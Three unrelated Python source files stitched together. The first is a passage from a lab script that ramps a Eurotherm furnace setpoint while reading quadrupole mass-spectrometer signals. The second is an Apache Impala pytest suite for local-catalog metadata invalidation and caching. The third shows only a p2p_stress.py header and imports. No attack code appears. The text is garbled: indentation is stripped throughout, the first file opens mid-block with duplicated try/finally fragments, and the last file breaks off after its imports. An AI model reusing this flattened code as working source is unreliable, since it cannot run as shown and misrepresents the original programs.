try:
time.sleep(0.01)
controlObj.close_me()
controlObj.open_me()
if iter_freq_ < len(mv_setpoints_):
controlObj.write_sp(mv_setpoints_[iter_freq_])
iter_freq_ += 1
else:
controlObj.write_sp(mv_setpoints_[0])
finally:
controlObj.close_me()
controlObj.open_me()
controlObj.write_sp(mv_setpoints_[0])
print('give up')
except (ValueError, OSError) as e:
print(e)
try:
time.sleep(0.01)
controlObj.close_me()
controlObj.open_me()
if iter_freq_ < len(mv_setpoints_):
controlObj.write_sp(mv_setpoints_[iter_freq_])
iter_freq_ += 1
else:
controlObj.write_sp(mv_setpoints_[0])
except (ValueError, OSError) as e:
print(e)
try:
time.sleep(0.01)
controlObj.close_me()
controlObj.open_me()
if iter_freq_ < len(mv_setpoints_):
controlObj.write_sp(mv_setpoints_[iter_freq_])
iter_freq_ += 1
else:
controlObj.write_sp(mv_setpoints_[0])
finally:
controlObj.close_me()
controlObj.open_me()
controlObj.write_sp(mv_setpoints_[0])
print('give up')
# if alpha_iter%int(2/sendFreq) == 0:
# # do stuff, adjust alpha
# end_alpha = time.time() - start_alpha
# alpha = alpha * (end_T - start_T) / (end_alpha * heatingRate)
#
#
# alpha_iter+=1
# for controlling the frequency that data is sent
# if time.time()-start_time < data_freq:
# time.sleep(data_freq - (time.time()-start_time))
# if iter_freq_ == len(mv_setpoints_)-1:
# return iter_freq_, mv_setpoints_[-1]
# else:
# return iter_freq_, mv_setpoints_[iter_freq_]
return iter_freq_
def thread_read_masses(list_of_masses_, list_of_sensitivities_, mass_signals_):
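    """Append one new QMS reading per (mass, sensitivity) pair to mass_signals_ and return it."""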
for mass, sens in zip(list_of_masses_, list_of_sensitivities_):
mass_signals_['mass{0}'.format(mass)] = np.append(mass_signals_['mass{0}'.format(mass)],
uti1.read_mass(mass, sens))
# mass_plot.setData(x=T_array, y=mass_signals['mass{0}'.format(mass)], pen='g')
return mass_signals_
def emergency_stop():
# stop increasing the temp and send a safe setpoint
controlObj.write_sp(0.0)
time.sleep(10)
quit()
class UTI_QMS():
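    """Thin ctypes wrapper around the LabVIEW-built DLL used to read a single QMS mass signal."""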
def __init__(self,path, dll='scan_single_mass.dll'):
self.path = path
self.dll = dll
os.chdir(self.path)
self.LabVIEWQMS = cdll.LoadLibrary(self.dll)
self.LabVIEWQMS.Read_Mass_Spec.argtype = [c_int32, c_double]
self.LabVIEWQMS.Read_Mass_Spec.restype = c_double
def read_mass(self, _mass_, sensitivity):
_signal_ = self.LabVIEWQMS.Read_Mass_Spec(c_int32(sensitivity), c_double(_mass_))
# return [signal, mass, sensitivity]
return _signal_
########################################################################################################################
rootdir = 'C:\\Users\\Administrator\\Desktop\\PythonProjects\\LabViewtest'
dlldir = 'C:\\Users\\Administrator\\Desktop\\builds\\scanmass_single\\scan_single_mass'
""" Create UTI instance """
uti1 = UTI_QMS(path=dlldir)
""" Create Eurotherm instances """
"Create obj for reading and writing temperature to Eurotherm"
port1 = 'COM4'
controlObj = Eurotherm(port1)
"Create obj for reading Room temperature from Eurotherm"
port2 = 'COM5'
controlObj2 = Eurotherm(port2)
"For reading in Room Temp to correct Temp reading"
typeC = thermocouples['C']
########################################################################################################################
""" User-Defined Parameters: """
os.chdir(rootdir)
project_folder = 'project_name'
os.makedirs(project_folder, exist_ok=True)
experiment_name ='name1.csv'
# TODO vary masses and see how that affects response
number_of_masses = 8
list_of_masses = [4.0, 12.2, 28.1, 32.4,4.1, 12.3, 28.12, 32.5]
list_of_sensitivities = [4, 4, 4, 4,4, 4, 4, 4]
heating_rate = 7 # K/s
os.chdir(rootdir)
with open('interp_mV_to_Temp_func.pickle', 'rb') as f:
mV_T_table = pickle.load(f)
start_temp = np.round(read_temp(
controlObj.read_val(), typeC.emf_mVC(controlObj2.read_rt()), mV_T_table), 2)
end_temp = 700
assert len(list_of_masses) == number_of_masses, 'lengths do not match up'
assert len(list_of_sensitivities) == number_of_masses, 'lengths do not match up'
assert len(list_of_masses) == len(set(list_of_masses)), 'you have duplicate masses being monitored'
########################################################################################################################
""" Check time to loop through masses: """
no_of_loops = 5
single_read_times = []
set_read_times = []
for i in range(no_of_loops):
start_set = time.time()
for j in range(number_of_masses):
start_single = time.time()
signal = uti1.read_mass(list_of_masses[j], list_of_sensitivities[j])
end_single = time.time() - start_single
single_read_times.append(end_single)
end_set = time.time() - start_set
set_read_times.append(end_set)
mean_single = np.mean(single_read_times)
""" This should be the time taken each loop to write setpoints """
mean_set = np.mean(set_read_times)
print("Average single read time is: {0}".format(np.round(mean_single, 4)))
print("Average set read time is: {0}".format(np.round(mean_set, 4)))
# Initial UTI looping
# mean_single, mean_set = loop__time(number_of_masses, list_of_masses, list_of_sensitivities)
""" Determine setpoint increment """
# multiple = 2 # how many times per second to change the setpoint
# temp_set_incr = heating_rate * mean_set/multiple # setpoint increment assuming each loop takes "mean_set" seconds
sendFreq = 0.1
alpha = 1
# rate_adjust = 1.9
# temp_set_incr = heating_rate * data_freq * rate_adjust # setpoint increment assuming each loop takes "mean_set" seconds
temp_set_incr = heating_rate * sendFreq*2 # setpoint increment assuming each loop takes "mean_set" seconds
# temp_set_incr = heating_rate * sendFreq*1.75 # setpoint increment assuming each loop takes "mean_set" seconds
temp_setpoints = np.arange(start_temp, end_temp+1, temp_set_incr)
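# Worked example: with heating_rate = 7 K/s and sendFreq = 0.1 s,
# temp_set_incr = 7 * 0.1 * 2 = 1.4 K per setpoint, so a ramp from a (hypothetical)
# start_temp near 300 K up to end_temp = 700 K yields roughly (700 - 300) / 1.4 ~ 286 setpoints.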
# making the list of setpoint values to be sent at each loop iteration
os.chdir(rootdir)
with open('interp_Temp_to_mV_func.pickle','rb') as interpdvalues:
interpd = pickle.load(interpdvalues)
# These are the mV that will be sent to the Eurotherm
mv_setpoints = interpd(temp_setpoints - controlObj2.read_rt())
""" Set up multiple plot windows for TPD """
app = pg.QtGui.QApplication([])
win1 = pg.GraphicsWindow(title="QMS Signal Plots")
win1.resize(710, int(970 / 4 * math.ceil(number_of_masses / 2)))  # Qt expects integer pixel sizes
win2 = pg.GraphicsWindow(title="Temperature Plot")
win2.resize(420, 400)
proxy = QtGui.QGraphicsProxyWidget()
button = QtGui.QPushButton('STOP')
proxy.setWidget(button)
Tplot = win2.addPlot(title="Temperature (K)", labels={'bottom': 'Time(s)', 'left': 'Temperature (K)'})
Tplot.addLegend()
Tplot.showGrid(x=True, y=True, alpha=1)
stop_button = win2.addItem(proxy)
button.clicked.connect(emergency_stop)
plots = []
for j in range(int(math.ceil(number_of_masses/2))):
plots.append([win1.addPlot(title="m/e = {0}".format(list_of_masses[2*j+i]), labels={'bottom': 'Temperature(K)',
'left': 'Signal (a.u.)'})
for i in range(2) if 2*j+i < number_of_masses])
win1.nextRow()
plots = list(itertools.chain.from_iterable(plots))
curves = [plots[k].plot() for k in range(number_of_masses)]
T_read_curve = Tplot.plot(name='readout')
T_set_curve = Tplot.plot(name='setpoint')
pg.QtGui.QApplication.processEvents()
""" Main script loops for TPD """
"""
Basic structure of measurement loop:
for asdfa:
do read mass and write sp(cycle time) use threads
thread1.join()
thread2.join()
do read value
"""
T_array = np.array([])
time_array = np.array([])
# Make mass spec signals a dictionary of np.arrays so we can append to and manipulate each individually
# initialize dictionary of empty arrays
mass_signals = {}
for i in list_of_masses:
mass_signals["mass{0}".format(i)] = np.array([])
"""
This will need to be threaded, below
"""
# num_freq = 1
iter_freq = 0
temp_plot_arr = np.array([])
# this needs to be the max temperature or allowed to cut short if needed, also allow for the threading
# TODO increase frequency that setpoints are sent, maybe this fixes the tracking issue at higher temperatures.
# for i in range(50):
print('len of setpoints is: '+str(len(mv_setpoints)))
alpha_iter = 1
while iter_freq < len(mv_setpoints):
# append current time to the array.
time_array = np.append(time_array, time.time())
# Read time and temperature data
cum_time = np.cumsum(np.concatenate(([0], np.diff(time_array))))
t = Thread(target=thread_read_masses, args=(list_of_masses, list_of_sensitivities, mass_signals))
t.start()
start_alpha = time.time()
    iter_freq = thread_send_mV_setpoint(iter_freq, mv_setpoints, sendFreq, alpha, t)
# Write new setpoint for temperature
try:
# controlObj.write_sp(mv_setpoints[iter_freq])
if iter_freq <= len(temp_setpoints) and iter_freq != 0:
# temp_plot_arr = np.append(temp_plot_arr, temp_setpoints[multiple*i])
temp_plot_arr = np.append(temp_plot_arr, temp_setpoints[iter_freq])
else:
temp_plot_arr = np.append(temp_plot_arr, temp_setpoints[0])
except IndexError as e:
print(e)
controlObj.write_sp(mv_setpoints[0])
# T_set_curve.setData(x=cum_time,y=temp_setpoints[:2*i+1:2], pen='r',name='setpoint')
# T_set_curve.setData(x=cum_time, y=temp_plot_arr[:2*len(cum_time):2], pen='r', name='setpoint')
try:
T_set_curve.setData(x=cum_time[:len(temp_plot_arr)], y=temp_plot_arr, pen='r', name='setpoint')
    except Exception:
T_set_curve.setData(x=cum_time, y=temp_plot_arr[:len(cum_time)], pen='r', name='setpoint')
T_array = np.append(T_array, read_Temp_value())
T_read_curve.setData(x=cum_time, y=T_array, pen='b', name='readout')
# if alpha_iter % int(2 / sendFreq) == 0:
if alpha_iter % 2 == 0:
# do stuff, adjust alpha
end_alpha = time.time() - start_alpha
eval_alpha = alpha * (T_array[-1] - T_array[-2]) / (end_alpha * heating_rate)
if eval_alpha > 0.7:
alpha = eval_alpha
print('alpha: ' + str(alpha))
alpha_iter += 1
for mass, mass_plot in zip(list_of_masses, curves):
mass_plot.setData(x=T_array, y=mass_signals['mass{0}'.format(mass)], pen='g')
# T_set_curve.setData(x=cum_time,y=temp_plot_arr[:len(cum_time)], pen='r',name='setpoint')
pg.QtGui.QApplication.processEvents()
# uncomment if you want to see some cooldown
if iter_freq == len(mv_setpoints):
break
# include changing setpoints in stuff above
# at the very end, go back to initial mV setpoint
controlObj.write_sp(mv_setpoints[0] - interpd(controlObj2.read_rt()+273.15))
"""
read current value and add to plot, also include setpoint curve here too
"""
# T_array = np.append(T_array, read_Temp_value())
# T_read_curve.setData(x=cum_time, y=T_array)
pg.QtGui.QApplication.processEvents()
controlObj.close_me()
controlObj2.close_me()
os.chdir(project_folder)
time_Temp_arr = np.vstack((cum_time, T_array))
combined_data = pd.concat([pd.DataFrame(time_Temp_arr).T, pd.DataFrame.from_dict(mass_signals)], axis=1)
combined_data.rename(columns={0:'Time(s)', 1:'Temp(K)'}, inplace=True)
# save experiment
combined_data.to_csv(experiment_name, index=False, sep='\t')
print('Saved experiment data to ' + experiment_name)
if __name__ == '__main__':
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
app.exec_() # Start QApplication event loop ***
|
test_local_catalog.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Test behaviors specific to --use_local_catalog being enabled.
import pytest
import Queue
import random
import re
import threading
import time
from multiprocessing.pool import ThreadPool
from tests.common.custom_cluster_test_suite import CustomClusterTestSuite
from tests.common.skip import (SkipIfHive2, SkipIfS3, SkipIfABFS,
SkipIfADLS, SkipIfIsilon, SkipIfLocal)
from tests.util.filesystem_utils import WAREHOUSE
RETRY_PROFILE_MSG = 'Retried query planning due to inconsistent metadata'
CATALOG_VERSION_LOWER_BOUND = 'catalog.catalog-object-version-lower-bound'
class TestCompactCatalogUpdates(CustomClusterTestSuite):
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true",
catalogd_args="--catalog_topic_mode=minimal")
def test_minimal_topic_updates_sync_ddl(self, unique_database):
"""
Start Impala cluster with minimal catalog update topics and local catalog enabled.
Run some smoke tests for SYNC_DDL to ensure that invalidations are propagated.
"""
self._do_test_sync_ddl(unique_database)
def _make_per_impalad_args(local_catalog_enabled):
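    """Build the --per_impalad_args start flag from a list of booleans, e.g.
    [True, False] -> "--per_impalad_args=--use_local_catalog=true;--use_local_catalog=false"
    """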
assert isinstance(local_catalog_enabled, list)
args = ['--use_local_catalog=%s' % str(e).lower()
for e in local_catalog_enabled]
return "--per_impalad_args=" + ";".join(args)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
start_args=_make_per_impalad_args([True, False]),
catalogd_args="--catalog_topic_mode=mixed")
def test_mixed_topic_updates_sync_ddl(self, unique_database):
"""
Same as above, but with 'mixed' mode catalog and different configs
on the two different impalads used by the test.
"""
self._do_test_sync_ddl(unique_database)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
start_args=_make_per_impalad_args([False, True]),
catalogd_args="--catalog_topic_mode=mixed")
def test_mixed_topic_updates_sync_ddl_2(self, unique_database):
"""
Same as above, but with opposite configurations for the two
impalads used in the test.
"""
self._do_test_sync_ddl(unique_database)
def _do_test_sync_ddl(self, unique_database):
""" Implementation details for above two tests. """
try:
impalad1 = self.cluster.impalads[0]
impalad2 = self.cluster.impalads[1]
client1 = impalad1.service.create_beeswax_client()
client2 = impalad2.service.create_beeswax_client()
view = "%s.my_view" % unique_database
# Try to describe the view before it exists - should get an error.
# This should prime any caches in impalad2.
err = self.execute_query_expect_failure(client2, "describe %s" % view)
assert 'Could not resolve' in str(err)
# Create it with SYNC_DDL from client 1.
query_options = {"sync_ddl": 1}
self.execute_query_expect_success(client1, "create view %s as select 1" % view,
query_options)
# It should be immediately visible from client 2.
self.execute_query_expect_success(client2, "describe %s" % view)
# Test global INVALIDATE METADATA
new_db = unique_database + '_new'
self.execute_query_expect_success(
client1, "create database if not exists %s" % new_db, query_options)
# The new database should be immediately visible from client 2.
self.execute_query_expect_success(client2, "describe database %s" % new_db)
# Drop database in Hive. Params: name, deleteData, cascade
self.hive_client.drop_database(new_db, True, True)
self.execute_query_expect_success(client1, "invalidate metadata", query_options)
err = self.execute_query_expect_failure(client2, "describe database %s" % new_db)
assert 'Database does not exist' in str(err)
finally:
client1.close()
client2.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true",
catalogd_args="--catalog_topic_mode=minimal")
def test_restart_catalogd(self, unique_database):
"""
Tests for the behavior of LocalCatalog when catalogd restarts.
"""
try:
impalad = self.cluster.impalads[0]
client = impalad.service.create_beeswax_client()
view = "%s.my_view" % unique_database
self.execute_query_expect_success(client, "create view %s as select 1" % view)
self.execute_query_expect_success(client, "select * from %s" % view)
# Should not have any detected restarts, initially.
self.assert_impalad_log_contains('WARNING', 'Detected catalog service restart',
expected_count=0)
# Kill catalogd, and while it's down, drop the view via HMS.
self.cluster.catalogd.kill()
# Drop the view via hive to ensure that when catalogd restarts,
# the impalads see the dropped view.
self.hive_client.drop_table(unique_database, "my_view", True)
# Start catalogd again. We should see the view disappear once the
# catalog pushes a new topic update.
self.cluster.catalogd.start()
NUM_ATTEMPTS = 30
for attempt in xrange(NUM_ATTEMPTS):
try:
self.assert_impalad_log_contains('WARNING', 'Detected catalog service restart')
err = self.execute_query_expect_failure(client, "select * from %s" % view)
assert "Could not resolve table reference" in str(err)
break
except Exception, e:
assert attempt < NUM_ATTEMPTS - 1, str(e)
time.sleep(1)
finally:
client.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true",
catalogd_args="--catalog_topic_mode=minimal")
def test_invalidate_stale_partitions(self, unique_database):
"""
Test that partition level invalidations are sent from catalogd and processed
correctly in coordinators.
TODO: Currently, there are no ways to get the cached partition ids in a LocalCatalog
coordinator. So this test infers them based on the query pattern. However, this
depends on the implementation details of catalogd which will evolve and may have to
change the partition ids in this test. A more robust ways is a) get the cached
partition id of a partition, b) run a DML on this partition, c) verify the old
partition id is invalidate.
"""
# Creates a partitioned table and inits 3 partitions on it. They are the first 3
# partitions loaded in catalogd. So their partition ids are 0,1,2.
self.execute_query("use " + unique_database)
self.execute_query("create table my_part (id int) partitioned by (p int)")
self.execute_query("alter table my_part add partition (p=0)")
self.execute_query("alter table my_part add partition (p=1)")
self.execute_query("alter table my_part add partition (p=2)")
# Trigger a query on all partitions so they are loaded in local catalog cache.
self.execute_query("select count(*) from my_part")
# Update all partitions. We should receive invalidations for partition id=0,1,2.
self.execute_query("insert into my_part partition(p) values (0,0),(1,1),(2,2)")
log_regex = "Invalidated objects in cache: \[partition %s.my_part:p=\d \(id=%%d\)\]"\
% unique_database
self.assert_impalad_log_contains('INFO', log_regex % 0)
self.assert_impalad_log_contains('INFO', log_regex % 1)
self.assert_impalad_log_contains('INFO', log_regex % 2)
# Trigger a query on all partitions so partitions with id=3,4,5 are loaded in local
# catalog cache.
self.execute_query("select count(*) from my_part")
# Update all partitions. We should receive invalidations for partition id=3,4,5.
# The new partitions are using id=6,7,8.
self.execute_query(
"insert overwrite my_part partition(p) values (0,0),(1,1),(2,2)")
self.assert_impalad_log_contains('INFO', log_regex % 3)
self.assert_impalad_log_contains('INFO', log_regex % 4)
self.assert_impalad_log_contains('INFO', log_regex % 5)
# Repeat the same test on non-partitioned tables
self.execute_query("create table my_tbl (id int)")
# Trigger a query to load the only partition which has partition id = 9.
self.execute_query("select count(*) from my_tbl")
# Update the table. So we should receive an invalidation on partition id = 9.
self.execute_query("insert into my_tbl select 0")
self.assert_impalad_log_contains(
'INFO', "Invalidated objects in cache: \[partition %s.my_tbl: \(id=9\)\]"
% unique_database)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true",
catalogd_args="--catalog_topic_mode=minimal")
def test_global_invalidate_metadata_with_sync_ddl(self, unique_database):
try:
impalad1 = self.cluster.impalads[0]
impalad2 = self.cluster.impalads[1]
client1 = impalad1.service.create_beeswax_client()
client2 = impalad2.service.create_beeswax_client()
# Create something to make the cache not empty.
self.execute_query_expect_success(
client1, "CREATE TABLE %s.my_tbl (i int)" % unique_database)
self.execute_query_expect_success(
client1, "CREATE FUNCTION %s.my_func LOCATION '%s/impala-hive-udfs.jar' "
"SYMBOL='org.apache.impala.TestUdf'" % (unique_database, WAREHOUSE))
self.execute_query_expect_success(
client1, "select * from functional.alltypestiny")
version_lower_bound = impalad1.service.get_metric_value(
CATALOG_VERSION_LOWER_BOUND)
# Reset catalog with SYNC_DDL from client 2.
query_options = {"sync_ddl": 1}
self.execute_query_expect_success(client2, "INVALIDATE METADATA", query_options)
assert version_lower_bound < impalad1.service.get_metric_value(
CATALOG_VERSION_LOWER_BOUND)
version_lower_bound = impalad1.service.get_metric_value(
CATALOG_VERSION_LOWER_BOUND)
assert version_lower_bound == impalad2.service.get_metric_value(
CATALOG_VERSION_LOWER_BOUND)
finally:
client1.close()
client2.close()
class TestLocalCatalogRetries(CustomClusterTestSuite):
def _check_metadata_retries(self, queries):
"""
Runs 'queries' concurrently, recording any inconsistent metadata exceptions.
'queries' is a list of query strings. The queries are run by two threads,
each one selecting a random query to run in a loop.
"""
# Tracks number of inconsistent metadata exceptions.
inconsistent_seen = [0]
inconsistent_seen_lock = threading.Lock()
# Tracks query failures for all other reasons.
failed_queries = Queue.Queue()
try:
client1 = self.cluster.impalads[0].service.create_beeswax_client()
client2 = self.cluster.impalads[1].service.create_beeswax_client()
def stress_thread(client):
# Loops, picks a random query in each iteration, runs it,
# and looks for retries and InconsistentMetadataFetchExceptions.
attempt = 0
while inconsistent_seen[0] == 0 and attempt < 200:
q = random.choice(queries)
attempt += 1
try:
ret = self.execute_query_unchecked(client, q)
          except Exception as e:
if 'InconsistentMetadataFetchException' in str(e):
with inconsistent_seen_lock:
inconsistent_seen[0] += 1
else:
failed_queries.put((q, str(e)))
threads = [threading.Thread(target=stress_thread, args=(c,))
for c in [client1, client2]]
for t in threads:
t.start()
for t in threads:
# When there are failures, they're observed quickly.
t.join(30)
assert failed_queries.empty(),\
"Failed query count non zero: %s" % list(failed_queries.queue)
finally:
client1.close()
client2.close()
return inconsistent_seen[0]
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true",
catalogd_args="--catalog_topic_mode=minimal")
def test_fetch_metadata_retry(self):
"""
Tests that operations that fetch metadata (excluding those fetches needed for
query planning) retry when they hit an InconsistentMetadataFetchException.
"""
queries = [
"show column stats functional.alltypes",
"show table stats functional.alltypes",
"describe extended functional.alltypes",
"show tables in functional like 'all*'",
"show files in functional.alltypes",
"refresh functional.alltypes"]
seen = self._check_metadata_retries(queries)
assert seen == 0, "Saw inconsistent metadata"
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true --local_catalog_max_fetch_retries=0",
catalogd_args="--catalog_topic_mode=minimal")
def test_replan_limit(self):
"""
Tests that the flag to limit the number of retries works and that
an inconsistent metadata exception when running concurrent reads/writes
is seen. With the max retries set to 0, no retries are expected and with
the concurrent read/write workload, an inconsistent metadata exception is
expected.
"""
queries = [
'refresh functional.alltypes',
'refresh functional.alltypes partition (year=2009, month=4)',
'select count(*) from functional.alltypes where month=4']
seen = self._check_metadata_retries(queries)
assert seen > 0, "Did not observe inconsistent metadata"
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true",
catalogd_args="--catalog_topic_mode=minimal")
def test_replan_on_stale_metadata(self, unique_database):
"""
Tests that when metadata is inconsistent while planning a query,
the query planner retries the query.
"""
try:
impalad1 = self.cluster.impalads[0]
impalad2 = self.cluster.impalads[1]
client1 = impalad1.service.create_beeswax_client()
client2 = impalad2.service.create_beeswax_client()
# Create a view in client 1, cache the table list including that view in
# client 2, and then drop it in client 1. While we've still cached the
# table list, try to describe the view from client 2 -- it should fail
# with the normal error message even though it had the inconsistent cache.
view = "%s.my_view" % unique_database
self.execute_query_expect_success(client1, "create view %s as select 1" % view)
self.execute_query_expect_success(client2, "show tables")
self.execute_query_expect_success(client1, "drop view %s" % view)
err = self.execute_query_expect_failure(client2, "describe %s" % view)
assert "Could not resolve path" in str(err)
# Run a mix of concurrent REFRESH and queries against different subsets
# of partitions. This causes partial views of the table to get cached,
# and then as the new partitions are loaded, we detect the version skew
# and issue re-plans. We run the concurrent workload until the profile
# indicates that a replan has happened.
# We expect stress_thread to cause a re-plan. The counter is stored in a
# mutable container so that stress_thread can update it.
# TODO: consolidate with _check_metadata_retries.
replans_seen = [0]
replans_seen_lock = threading.Lock()
# Queue to propagate exceptions from failed queries, if any.
failed_queries = Queue.Queue()
def stress_thread(client):
while replans_seen[0] == 0:
# TODO(todd) EXPLAIN queries don't currently yield a profile, so
# we have to actually run a COUNT query.
q = random.choice([
'invalidate metadata functional.alltypes',
'select count(*) from functional.alltypes where month=4',
'select count(*) from functional.alltypes where month=5'])
try:
ret = self.execute_query_expect_success(client, q)
except Exception as e:
failed_queries.put((q, str(e)))
continue
if RETRY_PROFILE_MSG in ret.runtime_profile:
with replans_seen_lock:
replans_seen[0] += 1
threads = [threading.Thread(target=stress_thread, args=(c,))
for c in [client1, client2]]
for t in threads:
t.start()
for t in threads:
t.join(30)
assert failed_queries.empty(), "Failed queries encountered: %s" %\
list(failed_queries.queue)
assert replans_seen[0] > 0, "Did not trigger any re-plans"
finally:
client1.close()
client2.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true --inject_latency_after_catalog_fetch_ms=50",
catalogd_args="--catalog_topic_mode=minimal",
cluster_size=1)
def test_invalidation_races(self, unique_database):
"""
Regression test for IMPALA-7534: races where invalidation of the table list
could be skipped, causing spurious "table not found" errors.
"""
test_self = self
class ThreadLocalClient(threading.local):
def __init__(self):
self.c = test_self.create_impala_client()
t = ThreadPool(processes=8)
tls = ThreadLocalClient()
def do_table(i):
for q in [
"create table {db}.t{i} (i int)",
"describe {db}.t{i}",
"drop table {db}.t{i}",
"create database {db}_{i}",
"show tables in {db}_{i}",
"drop database {db}_{i}"]:
self.execute_query_expect_success(tls.c, q.format(
db=unique_database, i=i))
# Prior to fixing IMPALA-7534, this test would fail within 20-30 iterations,
# so 100 should be quite reliable as a regression test.
NUM_ITERS = 100
for i in t.imap_unordered(do_table, xrange(NUM_ITERS)):
pass
class TestObservability(CustomClusterTestSuite):
def get_catalog_cache_metrics(self, impalad):
""" Returns catalog cache metrics as a dict by scraping the json metrics page on the
given impalad"""
child_groups =\
impalad.service.get_debug_webpage_json('metrics')['metric_group']['child_groups']
for group in child_groups:
if group['name'] != 'impala-server': continue
# Filter catalog cache metrics.
for child_group in group['child_groups']:
if child_group['name'] != 'catalog': continue
metrics_data = [(metric['name'], metric['value'])
for metric in child_group['metrics'] if 'catalog.cache' in metric['name']]
return dict(metrics_data)
assert False, "Catalog cache metrics not found in %s" % child_groups
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true",
catalogd_args="--catalog_topic_mode=minimal")
def test_cache_metrics(self, unique_database):
"""
Test that profile output includes impalad local cache metrics. Also verifies that
the daemon level metrics are updated between query runs.
"""
try:
impalad = self.cluster.impalads[0]
# Make sure local catalog mode is enabled and visible on web UI.
assert '(Local Catalog Mode)' in impalad.service.read_debug_webpage('/')
# Make sure /catalog_object endpoint is disabled on web UI.
      assert "No URI handler for '/catalog_object'" \
          in impalad.service.read_debug_webpage('/catalog_object')
client = impalad.service.create_beeswax_client()
cache_hit_rate_metric_key = "catalog.cache.hit-rate"
cache_miss_rate_metric_key = "catalog.cache.miss-rate"
cache_hit_count_metric_key = "catalog.cache.hit-count"
cache_request_count_metric_key = "catalog.cache.request-count"
cache_request_count_prev_run = 0
cache_hit_count_prev_run = 0
test_table_name = "%s.test_cache_metrics_test_tbl" % unique_database
# A mix of queries of various types.
queries_to_test = ["select count(*) from functional.alltypes",
"explain select count(*) from functional.alltypes",
"create table %s (a int)" % test_table_name,
"drop table %s" % test_table_name]
for _ in xrange(0, 10):
for query in queries_to_test:
ret = self.execute_query_expect_success(client, query)
assert ret.runtime_profile.count("Frontend:") == 1
assert ret.runtime_profile.count("CatalogFetch") > 1
cache_metrics = self.get_catalog_cache_metrics(impalad)
cache_hit_rate = cache_metrics[cache_hit_rate_metric_key]
cache_miss_rate = cache_metrics[cache_miss_rate_metric_key]
cache_hit_count = cache_metrics[cache_hit_count_metric_key]
cache_request_count = cache_metrics[cache_request_count_metric_key]
assert cache_hit_rate > 0.0 and cache_hit_rate < 1.0
assert cache_miss_rate > 0.0 and cache_miss_rate < 1.0
assert cache_hit_count > cache_hit_count_prev_run,\
"%s not updated between two query runs, query - %s"\
% (cache_hit_count_metric_key, query)
assert cache_request_count > cache_request_count_prev_run,\
"%s not updated betweeen two query runs, query - %s"\
% (cache_request_count_metric_key, query)
cache_hit_count_prev_run = cache_hit_count
cache_request_count_prev_run = cache_request_count
finally:
client.close()
class TestFullAcid(CustomClusterTestSuite):
@classmethod
def get_workload(self):
return 'functional-query'
@SkipIfHive2.acid
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true",
catalogd_args="--catalog_topic_mode=minimal")
def test_full_acid_support(self):
"""IMPALA-9685: canary test for full acid support in local catalog"""
self.execute_query("show create table functional_orc_def.alltypestiny")
res = self.execute_query("select id from functional_orc_def.alltypestiny")
res.data.sort()
assert res.data == ['0', '1', '2', '3', '4', '5', '6', '7']
@SkipIfHive2.acid
@SkipIfS3.hive
@SkipIfABFS.hive
@SkipIfADLS.hive
@SkipIfIsilon.hive
@SkipIfLocal.hive
@pytest.mark.execute_serially
def test_full_acid_scans(self, vector, unique_database):
self.run_test_case('QueryTest/full-acid-scans', vector, use_db=unique_database)
class TestReusePartitionMetadata(CustomClusterTestSuite):
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true",
catalogd_args="--catalog_topic_mode=minimal")
def test_reuse_partition_meta(self, unique_database):
"""
Test that unchanged partition metadata can be shared across table versions.
"""
self.execute_query(
"create table %s.alltypes like functional.alltypes" % unique_database)
self.execute_query("insert into %s.alltypes partition(year, month) "
"select * from functional.alltypes" % unique_database)
# Make sure the table is unloaded either in catalogd or coordinator.
self.execute_query("invalidate metadata %s.alltypes" % unique_database)
# First time: misses all(24) partitions.
self.check_missing_partitions(unique_database, 24)
# Second time: hits all(24) partitions.
self.check_missing_partitions(unique_database, 0)
# Alter comment on the table. Partition metadata should be reusable.
self.execute_query(
"comment on table %s.alltypes is null" % unique_database)
self.check_missing_partitions(unique_database, 0)
# Refresh one partition. Although table version bumps, metadata cache of other
# partitions should be reusable.
self.execute_query(
"refresh %s.alltypes partition(year=2009, month=1)" % unique_database)
self.check_missing_partitions(unique_database, 1)
# Drop one partition. Although table version bumps, metadata cache of existing
# partitions should be reusable.
self.execute_query(
"alter table %s.alltypes drop partition(year=2009, month=1)" % unique_database)
self.check_missing_partitions(unique_database, 0)
# Add back one partition. The partition meta is loaded in catalogd but not the
# coordinator. So we still miss its meta. For other partitions, we can reuse them.
self.execute_query(
"insert into %s.alltypes partition(year=2009, month=1) "
"select 0,true,0,0,0,0,0,0,'a','a',NULL" % unique_database)
self.check_missing_partitions(unique_database, 1)
def check_missing_partitions(self, unique_database, partition_misses):
"""Helper method for checking number of missing partitions while selecting
all partitions of the alltypes table"""
ret = self.execute_query_expect_success(
self.client, "explain select count(*) from %s.alltypes" % unique_database)
match = re.search(r"CatalogFetch.Partitions.Misses: (\d+)", ret.runtime_profile)
assert len(match.groups()) == 1
assert match.group(1) == str(partition_misses)
|
p2p_stress.py
|
import testUtils
import p2p_test_peers
import random
import time
import copy
import threading
from core_symbol import CORE_SYMBOL
class StressNetwork:
